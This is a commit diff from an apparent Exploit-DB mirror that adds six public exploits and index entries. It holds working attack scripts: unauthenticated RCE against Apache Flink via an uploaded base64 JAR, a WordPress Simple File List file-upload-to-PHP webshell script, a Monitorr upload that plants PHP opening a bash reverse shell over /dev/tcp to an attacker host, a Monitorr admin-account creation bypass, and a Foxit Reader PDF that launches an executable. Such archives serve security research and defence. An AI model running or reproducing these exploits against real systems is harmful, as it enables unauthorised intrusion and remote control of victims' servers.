bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-11-03

Browse source 
6 changes to exploits/shellcodes

Foxit Reader 9.7.1 - Remote Command Execution (Javascript API)
Quick N Easy FTP Service 3.2 - Unquoted Service Path
Apache Flink 1.9.x - File Upload RCE (Unauthenticated)
WordPress Plugin Simple File List 5.4 - Arbitrary File Upload
Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)
Monitorr 1.7.6m - Authorization Bypass
This commit is contained in:
Offensive Security 2020-11-03 05:02:04 +00:00
parent d852416732
commit 3cad5bf9ad
7 changed files with 468 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

139
exploits/java/webapps/48978.py Executable file
View file

@ -0,0 +1,139 @@
#!/usr/bin/env python3
# _*_ coding: utf-8 _*_
# Exploit Title: Apache Flink 1.9.x - File Upload RCE (Unauthenticated)
# Google Dork: None
# Date: 2020.11.01
# Exploit Author: bigger.wing
# Vendor Homepage: https://flink.apache.org/
# Software Link: https://flink.apache.org/downloads.html
# Version: 1.9.x
# Tested on: Centos7.x, 1.9.1
# CVE: None
import io
import re
import sys
import base64
import requests
class FlinkRCECheck:
def __init__(self, url):
self.url = url
self.timeout = 10
self.upload_file = 'rce_check_from_sec.jar'
self.headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/61.0 Safari/537.36'
}
@property
def get_version(self):
url = '%s/%s' % (self.url, 'config')
try:
res = requests.get(url, headers=self.headers, timeout=self.timeout, verify=False)
version = res.json().get('flink-version')
except:
version = 'unknown'
return version
@property
def jar_check(self):
url = '%s/%s' % (self.url, 'jars')
jar_list = []
try:
res = requests.get(url, headers=self.headers, verify=False, timeout=self.timeout)
if res.status_code == 200 and 'application/json' in res.headers.get('Content-Type', ''):
res = res.json()
for file in res['files']:
if file['id'].endswith(self.upload_file):
jar_list.append(file['id'])
except Exception as e:
pass
return jar_list
@property
def jar_upload(self):
url = '%s/%s' % (self.url, 'jars/upload')
jar_content = base64.b64decode('UEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My'
'0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALg'
'AAAFBLAwQKAAAIAAAidW1PAAAAAAAAAAAAAAAACQAAAE1FVEEtSU5GL1BLAwQUAAgICAAidW1PAAA'
'AAAAAAAAAAAAADQAAAEV4ZWN1dGUuY2xhc3ONVet2E1UU/k4yyUwmQy+TQlsQBdSStqSxiIotIlAK'
'VkJbSa0G8DKZHpPTJjNhLjTVCvoQ/ugT8MsfqCtx0aUPwEOx3Gdo09KGtUzW7H3O3vvbt7PPzPMXz'
'/4FMIlfdbyDyxo+1XBFx1Vc05HCjIbrks+quKHipobPNMzp0PC5hlsqChpu6+jBvCQLGhal6gsVd3'
'QUsaRjAF9qWJb8K0m+lqQkyd0URbin4r6OkzLoN5J/K8l3Or6HpaKswmZIXhKOCC4zxLOjywzKjLv'
'CGXoLwuHzYb3MvSWrXCOJWXBtq7ZseULud4RKUBU+Q6ow2+R2GPBpEtUt4TAcy94rrFoPrXzNcir5'
'YuAJpzItA7AGw/F9qkXPtbnvXwtFbYV75CDeCDZkuENo8m15FQqX6eKaHLuEtesrtJI2h0NIG7ujC'
'QNRyxdty3GiqPps0+aNQLiOr4J86EU39Gx+Q8gyjZ3yJiTSwLsYYQCD6voTjlXnKriBH1AxUIWgJN'
'aFY2AVawxDr6uToe9gCeSPsp/gTQoYy9syTI5k+bJw8n6VkogAws2/zCkVKcqWX5WWNQN1UNtjOQK'
'6oB73H6pSxQMDHnxpH5Dp/asGQjw0sA7KtwlhYAMjBn7ETwyDB9PrJB7fvLJpYBM/G3gEoeKxgV9Q'
'o0x3mvRKaQvlVW5TsMyeqNPoV3uw4Qe8zpCu8IBa1eCenIKRbJch6nb46cAtuOvcm7F8SmAg29VIs'
'10noOmk8Tix3/FM1fKK/EHIHZtPj95lONotLM1ukjeFH/jRXSGzhB9YXiDNR7tOW/8hIUMP1TfnNM'
'KA3HKLCh7cBdPJ7lMQfCjbVSETMUKfX+c1UReBPJKzr2/TgTFXq5Y/z5uUtOJELGHXXNmyuBvKSjo'
'RF8nJXipJq9HgDl2L3P86kL3LrAXu7nRnurim+A25w2m8Te9G+YvRxaILRvQs7fLE6a4hMdYGexqp'
's0STkZBhlKjx0gBjGCeewjnkyIrAbInskiT7y4wVxuLnb5vxv6G0kDCTLahbOLUNrZT8B6lS3NSLJ'
'cVMF0uJc8U2jPknuGAemVK20VMye9voa6F/C6rZK0W7mGFFYswOJtdCRuoHSsMU5Ggbx8zBFoamEs'
'OJFoa3kJb8+BMo4wW5OvEH3tjGyVIbb5pvtXBqnJ5o0cLpFs7s1fohjhCN01+BSvUMEr1AdV6Ejpt'
'I4xbpOXqxhj66kP34DSb+RCbqzR36WEwScoIaGSdEDu/RXpE9wXm8H/l9St4m5dsMv+MDWsXI28IO'
'Yg1zFP8jQjwifhEfU5+nCKWQ/TQ9l6IsP/kPUEsHCEEOnKXWAwAA4gYAAFBLAQIUABQACAgIACJ1b'
'U+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAAAAAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSw'
'ECCgAKAAAIAAAidW1PAAAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAB2AAAATUVUQS1JTkYvUEsBAhQ'
'AFAAICAgAInVtT0EOnKXWAwAA4gYAAA0AAAAAAAAAAAAAAAAAnQAAAEV4ZWN1dGUuY2xhc3NQSwUG'
'AAAAAAMAAwC4AAAArgQAAAAA')
files = {'jarfile': (self.upload_file, io.BytesIO(jar_content), 'application/octet-stream')}
try:
res = requests.post(url, headers=self.headers, files=files, timeout=self.timeout, verify=False)
file_id = res.json()['filename'].split('/')[-1]
return file_id
except Exception as e:
res = False
return res
@property
# delete history jar packages
def jar_delete(self):
for jar_name in self.jar_check:
url = '%s//jars/%s' % (self.url, jar_name)
try:
requests.delete(url=url, headers=self.headers, timeout=self.timeout, verify=False)
except:
pass
return
def rce(self, command):
jar_file = self.jar_upload
try:
execute_cmd_url = '%s/jars/%s/run?entry-class=Execute&program-args="%s"' % (self.url, jar_file, command)
res = requests.post(url=execute_cmd_url, headers=self.headers, timeout=self.timeout, verify=False)
res = re.findall('\|@\|(.*?)\|@\|', res.text)[0][0:-2]
if res:
print('rce command "%s" exec result: %s' % (command, res))
state = 1
msg = '%s rce success' % self.url
else:
state = 0
msg = '%s rce failed' % self.url
except:
state = 0
msg = '%s rce failed' % self.url
delete = self.jar_delete
return {'state': state, 'version': self.get_version, 'msg': msg}
if __name__ == '__main__':
usage = 'python3 script.py ip port command'
if len(sys.argv) != 4:
print('simple usage: %s' % usage)
else:
ip = sys.argv[1]
port = sys.argv[2]
command = sys.argv[3]
url = 'http://%s:%s' % (ip, port)
res = FlinkRCECheck(url=url).rce(command=command)
print(res)

99
exploits/php/webapps/48979.py Executable file
View file

@ -0,0 +1,99 @@
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Exploit Title: Wordpress Plugin Simple File List 5.4 - Arbitrary File Upload
# Date: 2020-11-01
# Exploit Author: H4rk3nz0 based off exploit by coiffeur
# Original Exploit: https://www.exploit-db.com/exploits/48349
# Vendor Homepage: https://simplefilelist.com/
# Software Link: https://wordpress.org/plugins/simple-file-list/ 
# Version: Wordpress v5.4 Simple File List v4.2.2 
import requests
import random
import hashlib
import sys
import os
import urllib3
urllib3.disable_warnings()
dir_path = '/wp-content/uploads/simple-file-list/'
upload_path = '/wp-content/plugins/simple-file-list/ee-upload-engine.php'
move_path = '/wp-content/plugins/simple-file-list/ee-file-engine.php'
file_name = raw_input('[*] Enter File Name (working directory): ')
protocol = raw_input('[*] Enter protocol (http/https): ')
http = protocol + '://'
def usage():
banner ="""
USAGE: python simple-file-list-upload.py <ip-address>
NOTES: Append :port to IP if required.
Advise the usage of a webshell as payload. Reverseshell payloads can be hit or miss.
"""
print (banner)
def file_select():
filename = file_name.split(".")[0]+'.png'
with open(file_name) as f:
with open(filename, 'w+') as f1:
for line in f:
f1.write(line)
print ('[+] File renamed to ' + filename)
return filename
def upload(url, filename):
files = {'file': (filename, open(filename, 'rb'), 'image/png')}
datas = {
'eeSFL_ID': 1,
'eeSFL_FileUploadDir': dir_path,
'eeSFL_Timestamp': 1587258885,
'eeSFL_Token': 'ba288252629a5399759b6fde1e205bc2',
}
r = requests.post(url=http + url + upload_path, data=datas,
files=files, verify=False)
r = requests.get(url=http + url + dir_path + filename, verify=False)
if r.status_code == 200:
print ('[+] File uploaded at ' + http + url + dir_path + filename)
os.remove(filename)
else:
print ('[-] Failed to upload ' + filename)
exit(-1)
return filename
def move(url, filename):
new_filename = filename.split(".")[0]+'.php'
headers = {'Referer': http + url + '/wp-admin/admin.php?page=ee-simple-file-list&tab=file_list&eeListID=1',
'X-Requested-With': 'XMLHttpRequest'}
datas = {
'eeSFL_ID': 1,
'eeFileOld': filename,
'eeListFolder': '/',
'eeFileAction': 'Rename|'+ new_filename,
}
r = requests.post(url= http + url + move_path, data=datas,
headers=headers, verify=False)
if r.status_code == 200:
print ('[+] File moved to ' + http + url + dir_path + new_filename)
else:
print ('[-] Failed to move ' + filename)
exit(-1)
return new_filename
def main(url):
file_to_upload = file_select()
uploaded_file = upload(url, file_to_upload)
moved_file = move(url, uploaded_file)
if moved_file:
print ('[^-^] Exploit seems to have worked...')
print ('\tURL: ' + http + url + dir_path + moved_file)
if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
exit(-1)
main(sys.argv[1])

29
exploits/php/webapps/48980.py Executable file
View file

@ -0,0 +1,29 @@
#!/usr/bin/python
# -*- coding: UTF-8 -*-
# Exploit Title: Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)
# Date: September 12, 2020
# Exploit Author: Lyhin's Lab
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
# Software Link: https://github.com/Monitorr/Monitorr
# Version: 1.7.6m
# Tested on: Ubuntu 19
import requests
import os
import sys
if len (sys.argv) != 4:
print ("specify params in format: python " + sys.argv[0] + " target_url lhost lport")
else:
url = sys.argv[1] + "/assets/php/upload.php"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/plain, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------31046105003900160576454225745", "Origin": sys.argv[1], "Connection": "close", "Referer": sys.argv[1]}
data = "-----------------------------31046105003900160576454225745\r\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"she_ll.php\"\r\nContent-Type: image/gif\r\n\r\nGIF89a213213123<?php shell_exec(\"/bin/bash -c 'bash -i >& /dev/tcp/"+sys.argv[2] +"/" + sys.argv[3] + " 0>&1'\");\r\n\r\n-----------------------------31046105003900160576454225745--\r\n"
requests.post(url, headers=headers, data=data)
print ("A shell script should be uploaded. Now we try to execute it")
url = sys.argv[1] + "/assets/data/usrimg/she_ll.php"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
requests.get(url, headers=headers)

25
exploits/php/webapps/48981.py Executable file
View file

@ -0,0 +1,25 @@
#!/usr/bin/python
# -*- coding: UTF-8 -*-
# Exploit Title: Monitorr 1.7.6m - Authorization Bypass
# Date: September 12, 2020
# Exploit Author: Lyhin's Lab
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
# Software Link: https://github.com/Monitorr/Monitorr
# Version: 1.7.6m
# Tested on: Ubuntu 19
# Monitorr 1.7.6m allows creation of administrative accounts by abusing the installation URL.
import requests
import os
import sys
if len (sys.argv) != 5:
print ("specify params in format: python " + sys.argv[0] + " target_url user_login user_email user_password")
else:
url = sys.argv[1] + "/assets/config/_installation/_register.php?action=register"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": url, "Connection": "close", "Referer": url, "Upgrade-Insecure-Requests": "1"}
data = {"user_name": sys.argv[2], "user_email": sys.argv[3], "user_password_new": sys.argv[4], "user_password_repeat": sys.argv[4], "register": "Register"}
requests.post(url, headers=headers, data=data)
print ("Done.")

139
exploits/windows/local/48982.pdf Normal file
View file

@ -0,0 +1,139 @@
# Exploit Title: Foxit Reader 9.7.1 - Remote Command Execution (Javascript API)
# Exploit Author: Nassim Asrir
# Vendor Homepage: https://www.foxitsoftware.com/
# Description: Foxit Reader before 10.0 allows Remote Command Execution via the unsafe app.opencPDFWebPage JavaScript API which allows an attacker to execute local files on the file system and bypass the security dialog.
The exploit process need the user-interaction (Opening the PDF) .
+ Process continuation
#POC
%PDF-1.4
%ÓôÌá
1 0 obj
<<
/CreationDate(D:20200821171007+02'00')
/Title(Hi, Can you see me ?)
/Creator(AnonymousUser)
>>
endobj
2 0 obj
<<
/Type/Catalog
/Pages 3 0 R
/Names
<<
/JavaScript 10 0 R
>>
>>
endobj
3 0 obj
<<
/Type/Pages
/Count 1
/Kids[4 0 R]
>>
endobj
4 0 obj
<<
/Type/Page
/MediaBox[0 0 595 842]
/Parent 3 0 R
/Contents 5 0 R
/Resources
<<
/ProcSet [/PDF/Text/ImageB/ImageC/ImageI]
/ExtGState
<<
/GS0 6 0 R
>>
/Font
<<
/F0 8 0 R
>>
>>
/Group
<<
/CS/DeviceRGB
/S/Transparency
/I false
/K false
>>
>>
endobj
5 0 obj
<<
/Length 94
/Filter/FlateDecode
>>
stream
Š»@@EûùŠ[RØk ­x•ÄüW"DDç덜âžÜœý“{‡éTg†¼tS)dÛ±=dœþ+9ŸifÔ ÈŒ [ŽãB_5!d§ZhP>¯ 
endstream
endobj
6 0 obj
<<
/Type/ExtGState
/ca 1
>>
endobj
7 0 obj
<<
/Type/FontDescriptor
/Ascent 833
/CapHeight 592
/Descent -300
/Flags 32
/FontBBox[-192 -710 702 1221]
/ItalicAngle 0
/StemV 0
/XHeight 443
/FontName/CourierNew,Bold
>>
endobj
8 0 obj
<<
/Type/Font
/Subtype/TrueType
/BaseFont/CourierNew,Bold
/Encoding/WinAnsiEncoding
/FontDescriptor 7 0 R
/FirstChar 0
/LastChar 255
/Widths[600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600]
>>
endobj
9 0 obj
<<
/S/JavaScript
/JS(app.opencPDFWebPage\('C:\\\\Windows\\\\System32\\\\calc.exe'\) )
>>
endobj
10 0 obj
<<
/Names[(EmbeddedJS)9 0 R]
>>
endobj
xref
0 11
0000000000 65535 f
0000000015 00000 n
0000000170 00000 n
0000000250 00000 n
0000000305 00000 n
0000000560 00000 n
0000000724 00000 n
0000000767 00000 n
0000000953 00000 n
0000002137 00000 n
0000002235 00000 n
trailer
<<
/ID[<7018DE6859F23E419162D213F5C4D583><7018DE6859F23E419162D213F5C4D583>]
/Info 1 0 R
/Root 2 0 R
/Size 11
>>
startxref
2283
%%EOF

31
exploits/windows/local/48983.txt Normal file
View file

@ -0,0 +1,31 @@
# Exploit Title: Quick 'n Easy FTP Service 3.2 - Unquoted Service Path
# Discovery by: yunaranyancat
# Discovery Date: October 2020
# Vendor Homepage: https://www.pablosoftwaresolutions.com/html/quick__n_easy_ftp_service.html
# Software Link : www.pablosoftwaresolutions.com/download.php?id=10
# Tested Version: 3.2
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 7
# Vulnerability discovery:
Registry value : HKLM\SYSTEM\ControlSet001\Services\Quick 'n Easy FTP Service
# Service info:
C:\>sc qc "Quick 'n Easy FTP Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Quick 'n Easy FTP Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 Normal
BINARY_PATH_NAME : C:\Program Files (x86)\Quick 'n Easy FTP Service\ftpservice.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Quick 'n Easy FTP Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.

6
files_exploits.csv
View file

@ -10397,6 +10397,8 @@ id,file,description,date,author,type,platform,port
48966,exploits/windows/local/48966.txt,"Program Access Controller v1.2.0.0 - 'PACService.exe' Unquoted Service Path",2020-10-28,"Mohammed Alshehri",local,windows,
48967,exploits/windows/local/48967.txt,"Prey 1.9.6 - _CronService_ Unquoted Service Path",2020-10-28,"Ömer Tuygun",local,windows,
48968,exploits/windows/local/48968.txt,"IP Watcher v3.0.0.30 - 'PACService.exe' Unquoted Service Path",2020-10-28,"Mohammed Alshehri",local,windows,
48982,exploits/windows/local/48982.pdf,"Foxit Reader 9.7.1 - Remote Command Execution (Javascript API)",2020-11-02,"Nassim Asrir",local,windows,
48983,exploits/windows/local/48983.txt,"Quick N Easy FTP Service 3.2 - Unquoted Service Path",2020-11-02,yunaranyancat,local,windows,
42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
@ -40796,6 +40798,10 @@ id,file,description,date,author,type,platform,port
48975,exploits/multiple/webapps/48975.py,"Citadel WebCit < 926 - Session Hijacking Exploit",2020-10-30,"Simone Quatrini",webapps,multiple,
48976,exploits/php/webapps/48976.txt,"Online Job Portal 1.0 - 'userid' SQL Injection",2020-10-30,"Akıner Kısa",webapps,php,
48977,exploits/php/webapps/48977.py,"Simple College Website 1.0 - 'username' SQL Injection / Remote Code Execution",2020-10-30,yunaranyancat,webapps,php,
48978,exploits/java/webapps/48978.py,"Apache Flink 1.9.x - File Upload RCE (Unauthenticated)",2020-11-02,bigger.wing,webapps,java,
48979,exploits/php/webapps/48979.py,"WordPress Plugin Simple File List 5.4 - Arbitrary File Upload",2020-11-02,H4rk3nz0,webapps,php,
48980,exploits/php/webapps/48980.py,"Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)",2020-11-02,"Lyhin\'s Lab",webapps,php,
48981,exploits/php/webapps/48981.py,"Monitorr 1.7.6m - Authorization Bypass",2020-11-02,"Lyhin\'s Lab",webapps,php,
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,

Can't render this file because it is too large.